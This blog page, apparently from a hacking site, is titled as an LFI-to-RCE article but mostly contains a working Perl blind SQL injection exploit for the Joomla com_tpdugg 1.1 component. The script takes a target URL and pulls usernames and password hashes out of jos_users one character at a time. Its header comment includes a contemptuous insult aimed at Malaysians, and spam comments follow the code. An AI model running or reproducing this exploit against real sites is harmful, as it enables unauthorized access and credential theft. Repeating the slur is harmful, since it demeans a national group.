LFI to RCE via access_log injection

TPDugg Joomla Component 1.1 Blind SQL Injection Exploit

#!/usr/bin/perl

#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////
#
# [o] TPDugg Joomla Component 1.1 Blind SQL Injection Exploit
#
# Software : com_tpdugg version 1.1
# Vendor : http://www.templateplazza.com/
# Author : NoGe
# Contact : noge[dot]code[at]gmail[dot]com
# Blog : http://evilc0de.blogspot.com - http://pacenoge.org
#
# [o] Usage
#
# root@noge:~# perl tpdugg.pl
#
#
# [+] URL Path : www.target.com/[path]
# [+] Valid ID : 1
# [+] Column : username
#
# [!] Exploiting http://www.target.com/[path]/ ...
#
# [+] SELECT username FROM jos_users LIMIT 0,1 ...
# [+] jos_users@username> admin
#
# [!] Exploit completed.
#
# [o] Simple Joomla Password Cracker
#
# http://pacenoge.org/joomla/
#
# [o] Greetz
#
# MainHack BrotherHood [ http://mainhack.net ]
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
#
# --=]> COPY MY STYLE BY SAYKOJI <[=--
#
# FUCK MALAYSIA!!!
# DON'T YOU HAVE YOUR OWN CULTURE?
# AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA...
#
#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////
use HTTP::Request;
use LWP::UserAgent;

# table : jos_users
# column : username and password

$cmsapp = '[-x-]';
$vuln = 'index.php?option=com_tpdugg&task=tags&id=';
$table = 'jos_users';
$regexp = 'There are no items';
$maxlen = 65;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
$cmsapp
[x]====================================================[x]
| Joomla Component com_tpdugg BSQL Injection Exploit |
| [F]ound by NoGe [C]oded by Vrs-hCk |
| www[dot]pacenoge[dot]org |
[x]====================================================[x]

\n";

print " [+] URL Path : "; chomp($web=);
print " [+] Valid ID : "; chomp($id=);
print " [+] Column : "; chomp($columns=);

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";

sub get_data() {
@columns = split(/,/, $columns);
foreach $column (@columns) {
print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
syswrite(STDOUT, " [+] $table\@$column> ", 255);
for (my $i=1; $i<=$maxlen; $i++) { my $chr = 0; my $found = 0; my $char = 48; while (!$chr && $char<=90) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } if(!$chr) { $char = 97; while(!$chr && $char<=122) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } } if (!$found) { print "\n"; last; } } } } sub exploit() { my $limit = $_[0]; my $chars = $_[1]; my $blind = '+AND+ASCII(SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1))='.$chars; my $inject = $target.$vuln.$id.$blind; my $content = get_content($inject); return $content; } sub get_content() { my $url = $_[0]; my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
my $res = $ua->request($req);
if ($res->is_error){
print "\n\n [!] Error, ".$res->status_line.".\n\n";
exit;
}
return $res->content;
}

Comments

labatterie said…
This is a great little trick to remember.
Anonymous said…
Joomla is popular CMS among all CMS Platforms. Hire a Joomla Programmer for custom Joomla development in affordable cost. We have dedicated team for Joomla development.
Unknown said…
Your post is really good providing good information.. I liked it and enjoyed reading it. Keep sharing such important posts.

affordable web design utah
Julie taylor said…
Given so much info in it, These type of articles keeps the users' interest in the website, and keep on sharing more ... good luck.
professional web development company | best php development company

Inwizards said…
Nice blog and absolutely outstanding. You can do something much better but i still say this perfect.Keep trying for the best. Hire Joomla Developers
Anonymous said…
I’ve read some good stuff here. Definitely worth bookmarking for revisiting. I surprise how much effort you put to create such a great informative website.Webdesign
Rose said…
This comment has been removed by the author.
Rahim Ladhani said…
Thanks for a wonderful share. Your article has proved-your hard work and the experience you have got in this field. Brilliant. Learn the cost of developing a Doctor appointment app.